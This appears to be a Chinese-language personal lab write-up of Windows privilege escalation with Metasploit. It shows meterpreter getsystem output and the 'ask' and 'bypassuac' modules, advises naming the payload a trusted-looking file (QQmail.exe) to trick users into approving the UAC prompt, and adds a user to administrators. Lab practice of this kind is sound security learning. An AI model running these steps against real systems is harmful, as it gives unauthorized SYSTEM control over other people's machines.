0x00:权限提升
提高程序运行级别
UAC绕过
利用提权漏洞进行提权
0x01:提高程序运行级别
(1)提高程序运行级别
msf模块
Exploit/windows/local/ask
getuid命令 :getuid命令用于获得运行meterpreter会话的用户名,从而查看当前会话具有的权限
meterpreter > getuid Server username: PLAYSTATION\Topsec-Training meterpreter > meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getwd C:\Users\Topsec-Training\Documents\Downloads meterpreter > meterpreter > meterpreter > getuid Server username: NT AUTHORITY\SYSTEM //getsystem之后权限就变了 meterpreter >
我这里直接可以获得权限了,应该是跟我的靶机配置有关
PS:输入get后按Tab键可以打印提示
如果getsystem失败,例如:这样证明当前权限不够
调用exploit/windows/local/ask 模块
msf5 exploit(multi/handler) > use exploit/windows/local/ask //调用模块 msf5 exploit(windows/local/ask) > msf5 exploit(windows/local/ask) > msf5 exploit(windows/local/ask) > info Name: Windows Escalate UAC Execute RunAs Module: exploit/windows/local/ask Platform: Windows Arch: Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2012-01-03 Provided by: mubix <[email protected]> b00stfr3ak Available targets: Id Name -- ---- 0 Windows Check supported: No Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME no File name on disk PATH no Location on disk, %TEMP% used if not set SESSION yes The session to run this module on. TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE) Payload information: Description: This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. msf5 exploit(windows/local/ask) >
设置session 和文件名 文件名设置为用户会信任 的文件名,文件路径什么的也能设置
msf5 exploit(windows/local/ask) > set session 1
session => 1
msf5 exploit(windows/local/ask) > set filename QQmail.exe filename => QQmail.exe msf5 exploit(windows/local/ask) > show options Module options (exploit/windows/local/ask): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME QQmail.exe no File name on disk PATH no Location on disk, %TEMP% used if not set SESSION 1 yes The session to run this module on. TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE) Exploit target: Id Name -- ---- 0 Windows msf5 exploit(windows/local/ask) > exploit
此时windows 7 应该出现,类似这样的弹窗,如果用户点击是提权成功,点击否提权失败
但是!我的靶机为什么没有弹窗。。。。。裂开,我的是直接生成了一个新的session,可能跟我靶机配置有关(气死偶咧)
不过总的来说,整个提权过程是这样的,用户点了“是”之后,进入新的session,getsystem
这种提权还是需要与用户交互
啊啊啊啊,再靶机上换了低权限的用户 ddg 连上session 。getsystem 提权失败 。 用户 ddg 属于 User组(防止用户有意无意的更改系统)
调用 exploit/windows/local/ask 还是没有出弹窗 不知道为什么了,用 没有权限的 session9 生成了 session11
但是 session11 还是无法 getsystem 还是必须要弹窗,让用户点击“是”
0x02:UAC绕过
msf模块
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
准备:session 4 是低权限的 session 3 是上面提过权限的
(1)调用exploit/windows/local/bypassuac 并设置options
改模块只需要设置一个 session即可
msf5 exploit(windows/local/bypassuac) > info //查看模块信息 Name: Windows Escalate UAC Protection Bypass Module: exploit/windows/local/bypassuac Platform: Windows Arch: Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2010-12-31 Provided by: David Kennedy "ReL1K" <[email protected]> mitnick mubix <[email protected]> Available targets: Id Name -- ---- 0 Windows x86 1 Windows x64 Check supported: No Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. TECHNIQUE EXE yes Technique to use if UAC is turned off (Accepted: PSH, EXE) Payload information: Description: This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. References: http://www.trustedsec.com/december-2010/bypass-windows-uac/ msf5 exploit(windows/local/bypassuac) >
会获得一个信息 会话,该会话 可以成功执行 getsystem
我的测试 :已经getsystem获得能够getsystem 应该会提醒 已经提权了
那么换一个普通用户
ddg 用户 提示 不再 admin 组中,所以失败了
(2)把 ddg用户 加到 admin 组中 试一下
net localgroup administrators ddg /add
貌似还是不行
跟人家视频上的一模一样啊,难道说是因为 我的靶场 没有漏洞吗
0x03:
Finished!